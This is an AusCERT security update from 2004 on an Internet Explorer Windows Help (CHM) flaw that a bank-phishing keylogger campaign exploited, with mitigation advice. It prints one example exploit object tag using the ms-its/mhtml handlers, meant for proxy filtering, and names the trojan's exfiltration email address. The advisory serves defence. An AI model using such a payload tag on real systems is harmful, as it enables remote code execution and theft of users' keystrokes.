Please note, the AusCERT Update contained on this page has been
superseded by ESB-2004.0268 (see above for link) which contains
information relating to the patches now available from Microsoft.


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

AusCERT Update AU-2004.007 - Vulnerability in Internet Explorer Allows
Program Execution
05 April 2004

A vulnerability in the handling of "Windows Help" files by Internet
Explorer allows the remote execution of arbitrary code on a local computer
by a malicious web site.  This vulnerability is currently being exploited
against Australian users using the bogus bank email reported in AusCERT
Alert AL-2004.10:

    http://www.auscert.org.au/3981

Following the link supplied in the message will initiate the execution of
the malicious key logger program on the user's computer.  A more detailed
breakdown of the actions taken by this combination of fraudulent email and
malicious trojan is at:

    http://www.codephish.info/modules.php?op=modload&name=News&file=article&sid=96

Details of the showHelp() vulnerability are available in Secunia advisory:

    http://secunia.com/advisories/10523/

At this time, AusCERT is not aware of a Microsoft patch for this
vulnerability.


Mitigation 

AusCERT recommends that users of Internet Explorer avoid visiting web sites
of untrusted origin, or avoid completely the use of Internet Explorer,
until a patch is available from Microsoft.  In any case, following links
in unsolicited email messages should be actively discouraged.

The current version of the key logging program sends the captured
information via e-mail to australia_tr@mail.ru. Blocking outbound email
to this address may be effective for this instance, but future versions
of the trojan are likely to use a different email address.

Removing the file type association for CHM files should prevent the
exploit, however this will effectively disable Windows Help.

System administrators with the ability to filter web traffic through a
proxy may be able to block access to pages referencing the affected object
tags which enable the exploit.

Example of a malicious "object" tag (with "localhost" substituted for the
malicious site URL):

object data="ms-its: mhtml:file://C:\test.mhtml!http://localhost//bad.chm::/bad.html"

    (the local file, C:\test.mhtml, does not exist)

The object tags used to exploit the vulnerability include:

    ms-its
    mk

AusCERT is aware of independent reports that disabling these protocol
handlers in the Windows registry may also prevent infection, but may also
have undesirable side-effects, including system restarting. AusCERT advise
that any actions of this nature should be taken only at the discretion of
your site, and only after isolated testing.

Anti-virus software and personal firewalls may be helpful in preventing
initial execution of the trojan (if file execution protection is available
and enabled), and in alerting the user of outbound connections by the email
component of the key logger.

Regards,

The AusCERT Team

===========================================================================
Australian Computer Emergency Response Team
The University of Queensland
Brisbane
Qld 4072

Internet Email: auscert@auscert.org.au
Facsimile:      (07) 3365 7031
Telephone:      (07) 3365 4417 (International: +61 7 3365 4417)
                AusCERT personnel answer during Queensland business hours
                which are GMT+10:00 (AEST).
                On call after hours for member emergencies only.
===========================================================================

-----BEGIN PGP SIGNATURE-----
Comment: http://www.auscert.org.au/render.html?it=1967

iQCVAwUBQHDvMSh9+71yA2DNAQJ8ZAP/QX6aVAiwQUkUZ7tDp9fw7RljjLMg+ko4
3N9Zv/H7c5BoLX7ae8YLKOrFJpT2b1Zzssv4g8pLB02j2l1oeOLXmTknqkwFfU3H
BGcnUHPHhp93l9jPYMQ5mmz+h5AuWo41aUgpPwlh7LjgHRMWSB86vE1Ah1JItDfX
uQdw4NoZ1Jw=
=BFAV
-----END PGP SIGNATURE-----